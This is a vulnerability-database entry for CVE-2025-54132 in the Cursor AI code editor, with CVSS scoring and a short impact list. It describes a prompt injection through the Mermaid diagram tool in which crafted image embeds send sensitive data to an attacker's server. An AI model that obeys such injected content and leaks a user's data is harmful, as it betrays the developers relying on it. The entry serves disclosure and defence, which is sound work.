Code Injection Vulnerability in Cursor AI Code Editor by Cursor
CVE-2025-54132

4.4MEDIUM

Key Information:

Vendor

Cursor

Status
Cursor
Vendor
CVE Published:
1 August 2025

What is CVE-2025-54132?

CVE-2025-54132 is a code injection vulnerability found in Cursor, an AI-enhanced code editor designed for streamlined programming workflows. This vulnerability exists in versions earlier than 1.3, particularly linked to the Mermaid tool used for rendering diagrams. By exploiting this vulnerability, an attacker can conduct a prompt injection that allows for the exfiltration of sensitive data to an external server controlled by the attacker. This exploitation pathway is made possible through mechanisms that permit image embedding, where crafted images can be used to retrieve sensitive information. The threat landscape surrounding this vulnerability necessitates immediate attention, as it can compromise the integrity of data processed within the code editor, making it a significant risk for organizations deploying this software in their development environments.

Potential impact of CVE-2025-54132

  1. Data Exfiltration: The primary risk of CVE-2025-54132 is the unauthorized extraction of sensitive information from affected systems, potentially leading to data breaches that can expose proprietary code, intellectual property, or personal data.

  2. Malicious Manipulations: By allowing an attacker to manipulate the behavior of the AI via prompt injection, the vulnerability creates opportunities for a malicious model to generate harmful outputs, which can mislead developers and compromise the quality of the code developed.

  3. Reputational Damage: Organizations using the affected versions of Cursor face significant reputational risks. A successful exploit could not only result in financial loss due to data breaches but also damage the trust of clients and users in the organization's ability to safeguard critical information.

Human OS v1.0:
Ageing Is an Unpatched Zero-Day Vulnerability.

Remediate biological technical debt. Prime Ageing uses 95% high-purity SIRT6 activation to maintain genomic integrity and bolster systemic resilience.

Deploy the Patch

Affected Version(s)

cursor < 1.3

References

https://github.com/cursor/cursor/security/advisories/GHSA...
x_refsource_CONFIRM

CVSS V3.1

Score:
4.4
Severity:
MEDIUM
Confidentiality:
High
Integrity:
None
Availability:
High
Attack Vector:
Network
Attack Complexity:
High
Privileges Required:
High
User Interaction:
None
Scope:
Unchanged

Timeline

  • Vulnerability published

JSON
.